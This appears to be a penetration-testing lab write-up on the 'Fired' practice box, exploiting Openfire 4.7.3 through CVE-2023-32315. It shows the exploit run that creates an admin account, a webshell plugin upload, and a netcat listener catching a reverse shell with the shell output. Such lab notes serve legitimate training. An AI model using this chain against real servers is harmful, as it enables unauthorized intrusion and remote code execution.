Authentication Bypass + RCE
The target Openfire instances on both port 9090 and 9091 are vulnerable to CVE-2023-32315 due to its outdated version; 4.7.3
Authentication Bypass
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ python3 CVE-2023-32315/CVE-2023-32315.py -t http://$IP:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://192.168.62.96:9090
Successfully retrieved JSESSIONID: node0bfvu9t6o2m0t18trp30vb6ofh1.node0 + csrf: HSvtTddM4fiZth1
User added successfully: url: http://192.168.201.96:9090 username: yd31cs password: k0apyyCredential Created
/Practice/Fired/3-Exploitation/attachments/{46C57728-3996-4795-8137-8B64B83AEFC9}.png)
/Practice/Fired/3-Exploitation/attachments/{8E890FA8-1AD0-4A13-9EB2-08D18FF2DC96}.png)
Successfully authenticated
The web application is absurdly unstable
Webshell Plugin
/Practice/Fired/3-Exploitation/attachments/Pasted-image-20250406230224.png)
/Practice/Fired/3-Exploitation/attachments/{95EE6D18-B5CD-42E7-B543-8A04075FB783}.png)
Uploading the supplied webshell plugin; Management Tool
/Practice/Fired/3-Exploitation/attachments/Pasted-image-20250406230906.png)
The uploaded webshell plugin is available under Server Settings > Management Tool
/Practice/Fired/3-Exploitation/attachments/Pasted-image-20250406230949.png)
Password is 123
/Practice/Fired/3-Exploitation/attachments/{ED253C39-A660-4630-9E6F-68C2BA37EB81}.png)
Code execution confirmed
Reverse Shell
/Practice/Fired/3-Exploitation/attachments/{55977701-FB10-488A-8F8C-C9B4C3451ECE}.png)
/Practice/Fired/3-Exploitation/attachments/{04C85A28-FE70-4C0D-B2E8-0408033AAC20}.png)
Uploading the payload & making it executable
/Practice/Fired/3-Exploitation/attachments/{42CA7BA8-A10C-4180-8BE7-B5DFC3007EE9}.png)
Invoking
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.96] 50278
whoami
openfire
hostname
openfire
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:61:84 brd ff:ff:ff:ff:ff:ff
inet 192.168.201.96/24 brd 192.168.201.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the openfire user via exploiting CVE-2023-32315 with a RCE plugin